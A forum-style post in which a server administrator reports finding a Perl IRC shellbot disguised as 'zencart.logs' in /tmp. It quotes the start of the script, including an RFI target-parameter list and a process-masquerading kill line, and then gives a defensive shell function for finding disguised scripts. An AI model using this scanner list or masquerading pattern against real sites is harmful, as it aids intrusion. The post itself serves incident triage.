I checked the /tmp directory and found a file of which the first few lines are:
#!/usr/bin/perl
This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
so the original author is atrix. the spread perl code was developed by sirhot (i am almost sure) he is from morocco.
Note to David Jacoby: Expect a few improvements for the next release.
The following comments are only left in the code to ridiculize this guy.
--------------------------------------------------------------
Morgan has hacked you!
Morgan Argentina, santiago del estero
oper morgan {
class clients;
from {
userhost @;
};
password "soyuncapo"; // morgan si, eres-un-capo.
oper morgan2 {
class clients;
from {
userhost @;
};
password "thegod"; //morgan si, eres el-dios.
-----------------------------------------------------------
system("kill -9 ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'
");
my $processo = '/usr/sbin/apache/log';
my @titi = ("index.php?page=","main.php?page=","index.php?p=","index.php?x=","main.php?p=","index.php?inc=","index.php?frame=","main.php?x=","index.php?path=","index.php?include=","main.php?path=","index.$
"default.php?page=",
"index.php?open=",
"index.php?pagina=",
"index.php?pg=",
"index.php?pag=",
"index.php?content=",
"index.php?cont=",
"index.php?c=",
"index.php?x=",
"index.php?cat=",
"index.php?site=",
"index.php?con=",
"index.php?action=",
"index.php?do=",
"index2.php?x=",
"index2.php?content=",
"template.php?pagina=","index.php?load=");
I really don’t know what I am looking at here b/c I don’t do code, but the commented section at the beginning of the file doesn’t look too friendly. Your thoughts? Also, here is a listing of the files in /tmp:
[root@host tmp]# ls -al
total 200
drwxrwxrwt 7 root root 4096 Aug 9 09:05 .
drwxr-xr-x 28 root root 4096 Aug 8 20:57 ..
drwxrwxrwt 2 root root 4096 Aug 8 20:58 .font-unix
drwxrwxrwt 2 root root 4096 Aug 8 20:57 .ICE-unix
lrwxrwxrwx 1 root root 25 Nov 23 2008 mysql.sock -> /var/lib/mysql/mysql.sock
-rw------- 1 iworx iworx 87096 Aug 8 21:55 sess_003c2504a28c7ead68011927eb5d8790
-rw------- 1 iworx iworx 30304 Aug 8 22:14 sess_0323a1ad9fd8ba28c7ea11e96851031a
drwxrwx--- 6 root iworx 4096 Nov 21 2007 siteworxoldimport7tG2yy
drwxrwx--- 6 root iworx 4096 Nov 10 2007 siteworxoldimport8Ca32w
drwxrwx--- 6 root root 4096 Aug 31 2008 siteworxoldimportyOJgyP
-rw-r--r-- 1 apache apache 17218 Aug 5 21:45 zencart.logs
-rw-r--r-- 1 apache apache 17218 Aug 5 21:45 zencart.logs.1
The excerpt above is from the file zencart.logs which is actually a script!
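
The post ends on a file that is named like a log but is really a script, and that can be checked for directly. The following is an added triage example, not part of the original post; the function name `find_disguised_scripts` and the list of extensions treated as honestly named scripts are assumptions of this example.

```shell
#!/bin/sh
# Added triage example (not from the original post).
#
# find_disguised_scripts DIR
#   Prints "owner<TAB>path<TAB>first line" for every regular file under DIR
#   whose content starts with an interpreter line ("#!") although its name
#   carries no script extension, e.g. a "*.logs" file that is really Perl.
#   The extension list below is an assumption; extend it for your hosts.
#
# Usage: find_disguised_scripts /tmp
find_disguised_scripts() {
    dir=${1:-/tmp}
    # -xdev keeps the walk on one filesystem; unreadable paths are skipped.
    find "$dir" -xdev -type f 2>/dev/null | while IFS= read -r f; do
        case "$f" in
            *.sh|*.pl|*.py|*.rb|*.php) continue ;;   # honestly named scripts
        esac
        # Look at the first two bytes only; strip NULs so binaries are safe.
        magic=$(head -c 2 "$f" 2>/dev/null | tr -d '\0') || continue
        [ "$magic" = '#!' ] || continue
        # The owner shows which account wrote the file (apache in the listing
        # above would point at the web server as the way in).
        owner=$(ls -ld "$f" | awk '{print $3}')
        first=$(head -n 1 "$f" | cut -c 1-80)
        printf '%s\t%s\t%s\n' "$owner" "$f" "$first"
    done
}
```

A hit owned by the web server account is a reason to preserve the file and its timestamps before cleaning up, and to review the web access logs around the file's modification time.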